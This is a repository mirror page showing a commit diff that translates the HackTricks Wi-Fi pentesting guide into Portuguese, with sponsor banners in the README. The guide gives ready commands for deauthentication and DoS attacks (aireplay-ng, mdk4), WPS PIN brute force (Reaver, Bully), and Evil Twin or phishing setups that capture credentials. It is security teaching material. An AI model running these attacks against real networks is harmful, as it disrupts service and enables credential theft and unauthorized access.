Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 23:20:49 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['README.md', 'generic-methodologies-and-resources/pentesting

Browse source
This commit is contained in:
Translator 2023-07-14 14:49:16 +00:00
parent 9ba134f439
commit ea0ccf9b78
7 changed files with 1262 additions and 477 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

25
README.md
View file

@ -5,7 +5,7 @@
_Logos e design de movimento do Hacktricks por_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
{% hint style="info" %}
**Bem-vindo ao wiki onde você encontrará cada truque/técnica/hack que aprendi em CTFs, aplicativos da vida real, pesquisas e notícias.**
**Bem-vindo ao wiki onde você encontrará todos os truques/técnicas/hacks que aprendi em CTFs, aplicativos da vida real, pesquisas e notícias.**
{% endhint %}
Aqui você pode encontrar uma pequena **introdução:**
@ -22,7 +22,7 @@ Aqui você encontrará o **fluxo típico** que **você deve seguir ao fazer pent
![](<.gitbook/assets/image (642) (1) (1) (1).png>)
[**STM Cyber**](https://www.stmcyber.com) é uma ótima empresa de cibersegurança cujo slogan é **HACKEIE O INVIOLÁVEL**. Eles realizam suas próprias pesquisas e desenvolvem suas próprias ferramentas de hacking para **oferecer vários serviços valiosos de cibersegurança** como pentesting, equipes de Red e treinamento.
[**STM Cyber**](https://www.stmcyber.com) é uma ótima empresa de cibersegurança cujo slogan é **HACKEIE O INVIOLÁVEL**. Eles realizam suas próprias pesquisas e desenvolvem suas próprias ferramentas de hacking para **oferecer vários serviços valiosos de cibersegurança**, como pentesting, equipes de Red e treinamento.
Você pode conferir o **blog** deles em [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
@ -40,7 +40,7 @@ Você pode conferir o **blog** deles em [**https://blog.stmcyber.com**](https://
![](.gitbook/assets/i3.png)
**Intigriti** é a plataforma de ethical hacking e **bug bounty número 1 da Europa.**
**Intigriti** é a plataforma de ethical hacking e **bug bounty número 1 da Europa**.
Dica de bug bounty: **cadastre-se** no **Intigriti**, uma plataforma premium de **bug bounty criada por hackers, para hackers**! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje mesmo e comece a ganhar recompensas de até **$100.000**!
@ -51,7 +51,7 @@ Dica de bug bounty: **cadastre-se** no **Intigriti**, uma plataforma premium de
<figure><img src=".gitbook/assets/image (9) (1) (2).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** com as ferramentas comunitárias mais avançadas do mundo.
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** com as ferramentas comunitárias **mais avançadas** do mundo.
Acesse hoje mesmo:
@ -59,15 +59,22 @@ Acesse hoje mesmo:
### [HACKENPROOF](https://bit.ly/3xrrDrL)
<figure><img src=".gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[Siga o HackenProof](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todos os bug bounties de criptografia.**
🐞 Leia tutoriais de bugs web3
**Seja recompensado sem atrasos**\
Os bounties do HackenProof são lançados apenas quando seus clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novos bug bounties
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se uma lenda hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) e comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
\---

491
generic-methodologies-and-resources/pentesting-wifi/README.md
View file

@ -5,24 +5,31 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Siga HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🐞 Leia tutoriais sobre bugs web3
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novos programas de recompensa por bugs
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
## Comandos básicos de Wifi
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
## Comandos básicos do Wifi
```bash
ip link show #List available interfaces
iwconfig #List available interfaces
@ -35,46 +42,92 @@ iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
```
## Ferramentas
### EAPHammer
EAPHammer é uma ferramenta de pentesting Wi-Fi que permite realizar ataques de autenticação EAP (Extensible Authentication Protocol) em redes sem fio. A ferramenta é projetada para testar a segurança de redes Wi-Fi e identificar possíveis vulnerabilidades. EAPHammer suporta vários métodos de ataque, incluindo ataques de força bruta, ataques de dicionário e ataques de falsificação de autenticação. A ferramenta é altamente configurável e oferece uma ampla gama de opções para personalizar os ataques. EAPHammer é uma ferramenta poderosa para testadores de penetração que desejam avaliar a segurança de redes Wi-Fi.
```
git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup
```
### Airgeddon
Airgeddon é uma ferramenta de teste de penetração de Wi-Fi que automatiza muitos dos processos envolvidos na obtenção de acesso a uma rede sem fio. Ele usa uma variedade de técnicas, incluindo ataques de dicionário, ataques de força bruta e ataques de desautenticação para tentar obter acesso à rede. A ferramenta também inclui recursos para capturar pacotes, analisar a segurança da rede e testar a força da senha. Com sua interface de usuário amigável e recursos poderosos, o Airgeddon é uma ferramenta popular entre os testadores de penetração e os hackers éticos.
Airgeddon is a multi-purpose tool designed for wireless penetration testing. It provides a comprehensive set of features and functionalities to assess the security of Wi-Fi networks. With Airgeddon, you can perform various attacks, such as deauthentication, fake access point creation, and password cracking.
#### Features
- **Deauthentication**: Airgeddon can send deauthentication frames to disconnect clients from a Wi-Fi network, allowing you to perform man-in-the-middle attacks or capture handshake packets.
- **Fake Access Point**: This tool can create a fake access point with a similar name to the target network, tricking clients into connecting to it. This enables you to intercept their traffic and gain unauthorized access.
- **Password Cracking**: Airgeddon supports various password cracking techniques, including dictionary attacks, brute-force attacks, and WPS PIN attacks. It can also leverage external tools like Aircrack-ng and Hashcat for more advanced cracking methods.
- **Evil Twin Attack**: With Airgeddon, you can set up an Evil Twin attack, where you create a rogue access point that mimics the target network. This allows you to capture sensitive information, such as login credentials, from unsuspecting users.
- **WPS Attacks**: Airgeddon includes several WPS attacks, such as Pixie Dust, which exploit vulnerabilities in the WPS protocol to retrieve the Wi-Fi network's password.
- **Handshake Capture**: This tool can capture handshake packets exchanged between a client and an access point, which are essential for offline password cracking.
- **Wireless Survey**: Airgeddon provides a wireless survey mode that allows you to scan nearby Wi-Fi networks, gather information about them, and identify potential targets for further attacks.
#### Usage
To use Airgeddon, you need a compatible wireless network adapter that supports monitor mode and packet injection. Once you have the necessary hardware, you can run Airgeddon on a Linux distribution, such as Kali Linux.
Airgeddon provides a user-friendly interface with step-by-step instructions for each attack. It also offers various customization options, allowing you to fine-tune the attack parameters according to your needs.
**Note**: It is important to use Airgeddon responsibly and only on networks that you have permission to test. Unauthorized use of this tool can lead to legal consequences.
```bash
mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe
```
**Executando o airgeddon com docker**
**Executar o airgeddon com docker**
O airgeddon é uma ferramenta de pentesting Wi-Fi que pode ser executada em um contêiner Docker. Isso permite que você execute a ferramenta em qualquer sistema operacional que suporte o Docker, sem precisar instalar dependências ou configurar o ambiente.
O airgeddon é uma ferramenta de teste de penetração Wi-Fi que pode ser executada em um ambiente Docker para facilitar a instalação e configuração. O Docker é uma plataforma de virtualização leve que permite empacotar aplicativos em contêineres isolados.
Para executar o airgeddon com Docker, siga estas etapas:
Para executar o airgeddon com o Docker, siga as etapas abaixo:
1. Instale o Docker em seu sistema operacional.
2. Baixe o repositório do airgeddon do GitHub.
3. Navegue até o diretório do airgeddon no terminal.
4. Execute o comando `docker build -t airgeddon .` para criar a imagem Docker.
5. Execute o comando `docker run -it --net=host --privileged airgeddon` para iniciar o contêiner Docker.
1. Certifique-se de ter o Docker instalado em seu sistema. Você pode encontrar instruções de instalação para o seu sistema operacional no site oficial do Docker.
Com esses passos, você poderá executar o airgeddon em um contêiner Docker e usá-lo para testar a segurança de redes Wi-Fi.
2. Clone o repositório do airgeddon do GitHub para o seu sistema:
```
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
```
3. Navegue até o diretório do airgeddon:
```
cd airgeddon
```
4. Construa a imagem Docker usando o arquivo Dockerfile fornecido:
```
docker build -t airgeddon .
```
5. Execute o airgeddon dentro de um contêiner Docker:
```
docker run -it --net=host --privileged airgeddon
```
O uso da opção `--net=host` permite que o contêiner acesse a interface de rede do host, o que é necessário para realizar testes de penetração Wi-Fi.
Agora você pode usar o airgeddon dentro do contêiner Docker para realizar testes de penetração em redes Wi-Fi. Certifique-se de seguir todas as leis e regulamentos aplicáveis ao realizar testes de penetração.
```bash
docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon
```
De: [https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux](https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux)
### wifiphisher
Ele pode realizar ataques de Evil Twin, KARMA e Beacons Conhecidos e, em seguida, usar um modelo de phishing para obter a senha real da rede ou capturar credenciais de redes sociais.
@ -87,47 +140,47 @@ sudo python setup.py install # Install any dependencies
Esta ferramenta automatiza ataques **WPS/WEP/WPA-PSK**. Ela irá automaticamente:
* Configurar a interface em modo monitor
* Configurar a interface em modo de monitoramento
* Escanear possíveis redes - E permitir que você selecione a(s) vítima(s)
* Se WEP - Lançar ataques WEP
* Se WPA-PSK
* Se WPS: ataque Pixie dust e ataque de força bruta (tenha cuidado, o ataque de força bruta pode levar muito tempo). Observe que ele não tenta PIN nulo ou PINs gerados/banco de dados.
* Tentar capturar o PMKID do AP para quebrá-lo
* Tentar desautenticar clientes do AP para capturar um handshake
* Se PMKID ou Handshake, tentar força bruta usando as top5000 senhas.
* Se for WEP - Lançar ataques WEP
* Se for WPA-PSK
* Se for WPS: Ataque Pixie dust e ataque de força bruta (tenha cuidado, o ataque de força bruta pode levar muito tempo). Observe que ele não tenta PIN nulo ou PINs gerados do banco de dados.
* Tentar capturar o PMKID do AP para quebrá-lo
* Tentar desautenticar clientes do AP para capturar um handshake
* Se tiver PMKID ou Handshake, tentar força bruta usando as 5000 senhas mais comuns.
## Resumo dos ataques
## Resumo dos Ataques
* **DoS**
* Desautenticação/disassociação -- Desconectar todos (ou um ESSID/Cliente específico)
* APs falsos aleatórios -- Esconder redes, possivelmente derrubar scanners
* Sobrecarregar AP -- Tentar derrubar o AP (geralmente não muito útil)
* WIDS -- Brincar com o IDS
* TKIP, EAPOL -- Alguns ataques específicos para DoS em alguns APs
* **Quebra de senha**
* Quebrar **WEP** (vários ferramentas e métodos)
* **WPA-PSK**
* **WPS** pin "Força Bruta"
* **WPA PMKID** força bruta
* \[DoS +] Captura de **handshake WPA** + Quebra de senha
* **WPA-MGT**
* **Captura de nome de usuário**
* **Força Bruta** Credenciais
* Pacotes de desautenticação/desassociação -- Desconectar todos (ou um ESSID/Cliente específico)
* APs falsos aleatórios -- Ocultar redes, possível travamento de scanners
* Sobrecarregar AP -- Tentar derrubar o AP (geralmente não é muito útil)
* WIDS -- Brincar com o IDS
* TKIP, EAPOL -- Alguns ataques específicos para DoS em alguns APs
* **Quebra de Senha**
* Quebrar **WEP** (várias ferramentas e métodos)
* **WPA-PSK**
* **WPS** pin "Força Bruta"
* **WPA PMKID** força bruta
* \[DoS +] Captura de **handshake WPA** + Quebra de senha
* **WPA-MGT**
* Captura de **nome de usuário**
* **Força Bruta** de credenciais
* **Evil Twin** (com ou sem DoS)
* **Open** Evil Twin \[+ DoS] -- Útil para capturar credenciais de portal cativo e/ou realizar ataques LAN
* **WPA-PSK** Evil Twin -- Útil para ataques de rede se você souber a senha
* **WPA-MGT** -- Útil para capturar credenciais da empresa
* **Evil Twin** **Aberto** \[+ DoS] -- Útil para capturar credenciais de portal cativo e/ou realizar ataques de LAN
* **Evil Twin** **WPA-PSK** -- Útil para ataques de rede se você souber a senha
* **WPA-MGT** -- Útil para capturar credenciais da empresa
* **KARMA, MANA**, **Loud MANA**, **Beacon conhecido**
* **+ Open** -- Útil para capturar credenciais de portal cativo e/ou realizar ataques LAN
* **+ WPA** -- Útil para capturar handshakes WPA
* **+ Aberto** -- Útil para capturar credenciais de portal cativo e/ou realizar ataques de LAN
* **+ WPA** -- Útil para capturar handshakes WPA
## DoS
### Pacotes de desautenticação
### Pacotes de Desautenticação
A forma mais comum deste tipo de ataque é feita com pacotes de **desautenticação**. Estes são um tipo de quadro "de gerenciamento" responsável por desconectar um dispositivo de um ponto de acesso. Forjar esses pacotes é a chave para [hackear muitas redes Wi-Fi](https://null-byte.wonderhowto.com/how-to/wi-fi-hacking/), pois você pode desconectar forçadamente qualquer cliente da rede a qualquer momento. A facilidade com que isso pode ser feito é um tanto assustadora e muitas vezes é feito como parte da coleta de um handshake WPA para quebrar.
A forma mais comum desse tipo de ataque é através de pacotes de **desautenticação**. Estes são um tipo de quadro "gerenciamento" responsável por desconectar um dispositivo de um ponto de acesso. Forjar esses pacotes é a chave para [hackear muitas redes Wi-Fi](https://null-byte.wonderhowto.com/how-to/wi-fi-hacking/), pois você pode desconectar forçadamente qualquer cliente da rede a qualquer momento. A facilidade com que isso pode ser feito é um tanto assustadora e muitas vezes é feito como parte da coleta de um handshake WPA para quebra de senha.
Além de usar momentaneamente essa desconexão para coletar um handshake para quebrar, você também pode deixar esses desautenticações continuarem chegando, o que tem o efeito de salpicar o cliente com pacotes de desautenticação aparentemente da rede à qual estão conectados. Como esses quadros não são criptografados, muitos programas se aproveitam dos quadros de gerenciamento, forjando-os e enviando-os para um ou todos os dispositivos em uma rede.\
Além de usar momentaneamente essa desconexão para obter um handshake para quebrar, você também pode deixar essas desautenticações continuarem, o que tem o efeito de enviar pacotes de desautenticação para o cliente aparentemente da rede à qual estão conectados. Como esses quadros não são criptografados, muitos programas se aproveitam dos quadros de gerenciamento, forjando-os e enviando-os para um ou todos os dispositivos em uma rede.\
**Descrição retirada da** [**qui**](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.**
**Desautenticação usando Aireplay-ng**
@ -137,24 +190,24 @@ aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
* \-0 significa desautenticação
* 1 é o número de desautenticações a serem enviadas (você pode enviar várias se desejar); 0 significa enviá-las continuamente
* \-a 00:14:6C:7E:40:80 é o endereço MAC do ponto de acesso
* \-c 00:0F:B5:34:30:30 é o endereço MAC do cliente a ser desautenticado; se isso for omitido, então a desautenticação de broadcast é enviada (nem sempre funciona)
* \-c 00:0F:B5:34:30:30 é o endereço MAC do cliente a ser desautenticado; se isso for omitido, será enviada uma desautenticação de transmissão (nem sempre funciona)
* ath0 é o nome da interface
### Pacotes de Disassociação
### Pacotes de Desassociação
Pacotes de disassociação são outro tipo de quadro de gerenciamento que é usado para desconectar um nó (qualquer dispositivo como um laptop ou celular) de um ponto de acesso próximo. A diferença entre os quadros de desautenticação e de disassociação é principalmente a maneira como são usados.
Pacotes de desassociação são outro tipo de quadro de gerenciamento que é usado para desconectar um nó (ou seja, qualquer dispositivo como um laptop ou celular) de um ponto de acesso próximo. A diferença entre os quadros de desautenticação e desassociação é principalmente a forma como são usados.
Um AP que procura desconectar um dispositivo invasor enviaria um pacote de desautenticação para informar o dispositivo de que ele foi desconectado da rede, enquanto um pacote de disassociação é usado para desconectar quaisquer nós quando o AP está desligando, reiniciando ou deixando a área.
Um ponto de acesso que deseja desconectar um dispositivo não autorizado enviaria um pacote de desautenticação para informar o dispositivo de que ele foi desconectado da rede, enquanto um pacote de desassociação é usado para desconectar quaisquer nós quando o ponto de acesso está desligando, reiniciando ou saindo da área.
**Descrição da** [**qui**](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.**
**Descrição retirada** [**aqui**](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.**
**Este ataque pode ser realizado pelo mdk4 (modo "d"):**
**Esse ataque pode ser realizado pelo mdk4 (modo "d"):**
```bash
# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F
```
### **Mais ataques de DOS por mdk4**
@ -171,7 +224,7 @@ Envia quadros de beacon para mostrar APs falsos aos clientes. Isso às vezes pod
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m
```
**MODO DE ATAQUE a: Negação de Serviço de Autenticação**
**MODO DE ATAQUE a: Negativa de Serviço de Autenticação**
Envia quadros de autenticação para todos os APs encontrados na área. Muitos clientes podem congelar ou reiniciar vários APs.
```bash
@ -183,11 +236,11 @@ mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m
```
**MODO DE ATAQUE p: Sondagem de SSID e Força Bruta**
Sonda os APs e verifica se há resposta, útil para verificar se o SSID foi decodificado corretamente e se o AP está dentro do seu alcance de envio. A **força bruta de SSIDs ocultos** com ou sem uma lista de palavras também está disponível.
Sonda os pontos de acesso (APs) e verifica se há resposta, útil para verificar se o SSID foi corretamente revelado e se o AP está dentro do seu alcance de envio. Também é possível realizar a **força bruta de SSIDs ocultos** com ou sem uma lista de palavras.
**MODO DE ATAQUE m: Exploração de Contramedidas Michael**
**MODO DE ATAQUE m: Exploração de Contramedidas de Michael**
Envia pacotes aleatórios ou reinjeta duplicatas em outra fila QoS para provocar as Contramedidas Michael em **APs TKIP**. O AP então desligará por um minuto inteiro, tornando isso um **DoS** efetivo.
Envia pacotes aleatórios ou reinjeta duplicatas em outra fila de QoS para provocar as Contramedidas de Michael em APs **TKIP**. O AP então será desligado por um minuto inteiro, tornando isso um **DoS** efetivo.
```bash
# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
@ -195,25 +248,25 @@ mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]
```
**MODO DE ATAQUE e: Injeção de Pacotes EAPOL Start e Logoff**
Inunda um AP com quadros de início **EAPOL** para mantê-lo ocupado com **sessões falsas** e, assim, desabilitá-lo para lidar com quaisquer clientes legítimos. Ou desconecta clientes **injetando mensagens falsas** de **Logoff EAPOL**.
Inunda um AP com quadros de início **EAPOL** para mantê-lo ocupado com **sessões falsas** e, assim, desabilitá-lo para lidar com clientes legítimos. Ou desconecta clientes **injetando mensagens falsas** de Logoff EAPOL.
```bash
# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]
```
**MODO DE ATAQUE s: Ataques para redes mesh IEEE 802.11s**
Vários ataques à gestão de links e roteamento em redes mesh. Inunde vizinhos e rotas, crie buracos negros e desvie o tráfego!
Vários ataques à gestão de links e roteamento em redes mesh. Inundar vizinhos e rotas, criar buracos negros e desviar o tráfego!
**MODO DE ATAQUE w: Confusão WIDS**
**MODO DE ATAQUE w: Confusão de WIDS**
Confunda/Abuse os Sistemas de Detecção e Prevenção de Intrusão cruzando clientes para múltiplos nós WDS ou falsos APs rogue.
Confundir/abusar de Sistemas de Detecção e Prevenção de Intrusões, conectando clientes a vários nós WDS ou a falsos APs rogue.
```bash
# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]
```
**MODO DE ATAQUE f: Fuzzer de Pacotes**
Um fuzzer de pacotes simples com várias fontes de pacotes e um bom conjunto de modificadores. Tenha cuidado!
Um fuzzer de pacotes simples com várias fontes de pacotes e um conjunto interessante de modificadores. Tenha cuidado!
### **Airggedon**
@ -225,55 +278,55 @@ _**Airgeddon**_ oferece a maioria dos ataques propostos nos comentários anterio
WPS significa Wi-Fi Protected Setup. É um padrão de segurança de rede sem fio que tenta tornar as conexões entre um roteador e dispositivos sem fio mais rápidas e fáceis. **O WPS funciona apenas para redes sem fio que usam uma senha** que é criptografada com os protocolos de segurança **WPA** Personal ou **WPA2** Personal. O WPS não funciona em redes sem fio que estão usando a segurança WEP obsoleta, que pode ser facilmente quebrada por qualquer hacker com um conjunto básico de ferramentas e habilidades. (De [aqui](https://www.digitalcitizen.life/simple-questions-what-wps-wi-fi-protected-setup))
O WPS usa um PIN de 8 dígitos para permitir que um usuário se conecte à rede, mas primeiro são verificados os primeiros 4 números e, se estiverem corretos, então são verificados os segundos 4 números. Em seguida, é possível fazer um Brute-Force na primeira metade e depois na segunda metade (apenas 11000 possibilidades).
O WPS usa um PIN de 8 dígitos para permitir que um usuário se conecte à rede, mas primeiro são verificados os primeiros 4 números e, se estiverem corretos, então são verificados os segundos 4 números. Assim, é possível fazer um ataque de força bruta na primeira metade e depois na segunda metade (apenas 11000 possibilidades).
### Brute-Force WPS
### Força Bruta no WPS
Existem 2 ferramentas principais para realizar esta ação: Reaver e Bully.
Existem 2 ferramentas principais para realizar essa ação: Reaver e Bully.
* **Reaver** foi projetado para ser um ataque robusto e prático contra o WPS e foi testado em uma ampla variedade de pontos de acesso e implementações do WPS.
* **Bully** é uma **nova implementação** do ataque de força bruta WPS, escrita em C. Tem várias vantagens sobre o código original do reaver: menos dependências, melhor desempenho de memória e CPU, manipulação correta de endianness e um conjunto mais robusto de opções.
* **Bully** é uma **nova implementação** do ataque de força bruta no WPS, escrita em C. Ele possui várias vantagens em relação ao código original do reaver: menos dependências, melhor desempenho de memória e CPU, manipulação correta de endianness e um conjunto mais robusto de opções.
Este ataque aproveita uma **vulnerabilidade no código PIN WPS de oito dígitos**; devido a esse problema, o protocolo **revela informações sobre os quatro primeiros dígitos do PIN**, e o **último** dígito funciona como um **checksum**, o que torna fácil a força bruta do WPS AP.\
Observe que alguns dispositivos incluem **proteções de força bruta**, que geralmente **bloqueiam endereços MAC** que tentam atacar repetidamente. Nesse caso, a complexidade desse ataque aumenta, porque você teria que **rotacionar os endereços MAC** enquanto testa os PINs.
Esse ataque aproveita uma **vulnerabilidade no código PIN WPS de oito dígitos**; devido a esse problema, o protocolo **revela informações sobre os quatro primeiros dígitos do PIN**, e o **último** dígito funciona como um **checksum**, o que facilita a força bruta no AP WPS.\
Observe que alguns dispositivos incluem **proteções contra força bruta**, que geralmente **bloqueiam endereços MAC** que tentam atacar repetidamente. Nesse caso, a complexidade desse ataque aumenta, pois você teria que **rotacionar os endereços MAC** enquanto testa os PINs.
Se o código válido do WPS for encontrado, tanto o Bully quanto o Reaver o usarão para descobrir o PSK WPA/WPA2 usado para proteger a rede, para que você possa se conectar sempre que precisar.
Se o código WPS válido for encontrado, tanto o Bully quanto o Reaver o usarão para descobrir o PSK WPA/WPA2 usado para proteger a rede, para que você possa se conectar sempre que precisar.
```bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
```
**Smart Brute force**
Em vez de começar a tentar todos os PINs possíveis, você deve verificar se **PINs descobertos para o AP que você está atacando** (dependendo do MAC do fabricante) e os **PINs gerados pelo software PIN**.
Em vez de começar a tentar todos os PINs possíveis, você deve verificar se existem **PINs descobertos para o AP que você está atacando** (dependendo do MAC do fabricante) e os **PINs gerados pelo software**.
* O banco de dados de PINs conhecidos é feito para Access Points de certos fabricantes para os quais se sabe que usam os mesmos PINs WPS. Este banco de dados contém os três primeiros octetos dos endereços MAC e uma lista de PINs correspondentes que são muito prováveis para este fabricante.
* O banco de dados de PINs conhecidos é feito para Access Points de certos fabricantes, nos quais é sabido que eles usam os mesmos PINs WPS. Este banco de dados contém os três primeiros octetos dos endereços MAC e uma lista de PINs correspondentes que são muito prováveis para este fabricante.
* Existem vários algoritmos para gerar PINs WPS. Por exemplo, ComputePIN e EasyBox usam o endereço MAC do Access Point em seus cálculos. Mas o algoritmo Arcadyan também requer um ID de dispositivo.
### Ataque WPS Pixie Dust
Dominique Bongard descobriu que alguns APs têm maneiras fracas de gerar **nonces** (conhecidos como **E-S1** e **E-S2**) que devem ser secretos. Se formos capazes de descobrir quais são esses nonces, podemos facilmente encontrar o PIN WPS de um AP, já que o AP deve nos fornecê-lo em um hash para provar que também conhece o PIN, e o cliente não está se conectando a um AP falso. Esses E-S1 e E-S2 são essencialmente as "chaves para desbloquear a caixa de bloqueio" contendo o PIN WPS. Mais informações aqui: [https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\))
Dominique Bongard descobriu que alguns APs têm maneiras fracas de gerar **nonces** (conhecidos como **E-S1** e **E-S2**) que devem ser secretos. Se formos capazes de descobrir quais são esses nonces, podemos facilmente encontrar o PIN WPS de um AP, pois o AP deve nos fornecê-lo em um hash para provar que ele também conhece o PIN, e o cliente não está se conectando a um AP falso. Esses E-S1 e E-S2 são essencialmente as "chaves para desbloquear a caixa de fechadura" que contém o PIN WPS. Mais informações aqui: [https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\))
Basicamente, algumas implementações falharam no uso de chaves aleatórias para criptografar as 2 partes do PIN (como é decomposto em 2 partes durante a comunicação de autenticação e enviado ao cliente), então um ataque offline poderia ser usado para forçar a descoberta do PIN válido.
